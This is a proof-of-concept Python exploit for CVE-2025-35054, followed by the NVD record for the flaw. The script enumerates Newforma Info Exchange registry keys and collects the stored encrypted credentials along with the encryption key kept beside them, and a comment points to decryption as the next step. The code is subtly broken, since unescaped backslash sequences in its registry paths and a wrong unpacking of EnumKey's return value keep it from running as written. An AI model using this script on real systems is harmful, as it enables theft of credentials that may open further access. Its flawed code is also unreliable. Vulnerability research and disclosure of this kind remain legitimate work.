CVE-2025-35054

# PoC for CVE-2025-35054 # Exploit: Extract encrypted credentials and decryption key from Windows Registry # Target: Newforma Info Exchange (NIX) NPCS configuration # Registry Path: HKLM\Software\WOW6432Node\Newforma\<version>\Credentials import winreg import sys def extract_nix_credentials(version="Latest"): """ Extract encrypted credentials and encryption key from NIX registry. The encryption key is stored alongside the encrypted credentials, allowing trivial decryption by any authenticated user. """ registry_path = f"SOFTWARE\WOW6432Node\Newforma\{version}\Credentials" try: # Open the registry key (HKLM\Software\WOW6432Node\Newforma\<version>\Credentials) reg_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, registry_path, 0, winreg.KEY_READ ) credentials = {} encryption_key = None # Enumerate all values under the Credentials key i = 0 while True: try: value_name, value_data, value_type = winreg.EnumValue(reg_key, i) # The encryption key is typically stored in the same location if "key" in value_name.lower() or "secret" in value_name.lower(): encryption_key = value_data print(f"[+] Found encryption key: {value_name}") else: credentials[value_name] = value_data print(f"[+] Found encrypted credential: {value_name}") i += 1 except OSError: break winreg.CloseKey(reg_key) if encryption_key and credentials: print(f"\n[!] VULNERABLE: Encryption key found alongside credentials!") print(f"[!] Key location: HKLM\\{registry_path}") print(f"[!] Number of credentials found: {len(credentials)}") print(f"\n[*] An attacker with local access can decrypt these credentials") print(f"[*] using the co-located encryption key to obtain plaintext.") # In a real exploit, the next step would be to use the encryption_key # to decrypt each credential value using the same algorithm NIX uses. return credentials, encryption_key else: print("[-] Encryption key or credentials not found at expected path.") return None, None except PermissionError: print("[-] Permission denied. Requires at least local user access.") return None, None except FileNotFoundError: print(f"[-] Registry path not found: {registry_path}") print("[-] NIX may not be installed or version path differs.") return None, None if __name__ == "__main__": print("=" * 70) print("CVE-2025-35054 - Newforma Info Exchange Credential Extraction PoC") print("=" * 70) # Try to enumerate installed Newforma versions try: parent_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\WOW6432Node\Newforma", 0, winreg.KEY_READ ) i = 0 versions = [] while True: try: version, _, _ = winreg.EnumKey(parent_key, i) versions.append(version) i += 1 except OSError: break winreg.CloseKey(parent_key) if versions: print(f"\n[*] Found Newforma versions: {versions}") for ver in versions: extract_nix_credentials(ver) else: extract_nix_credentials() except FileNotFoundError: print("[-] Newforma software not found on this system.")

{"cve": {"id": "CVE-2025-35054", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-09T21:15:36.357", "lastModified": "2025-10-22T15:18:27.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Newforma Info Exchange (NIX) stores credentials used to configure NPCS in 'HKLM\\Software\\WOW6432Node\\Newforma\\<version>\\Credentials'. The credentials are encrypted but the encryption key is stored in the same registry location. Authenticated users can access both the credentials and the encryption key. If these are Active Directory credentials, an attacker may be able to gain access to additional systems and resources."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-257"}, {"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-922"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newforma:project_center:*:*:*:*:*:*:*:*", "versionEndIncluding": "2024.3", "matchCriteriaId": "71630A80-6292-4C7B-A5C9-8C6877EE229E"}]}]}], "references": [{"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-282-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-35054", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}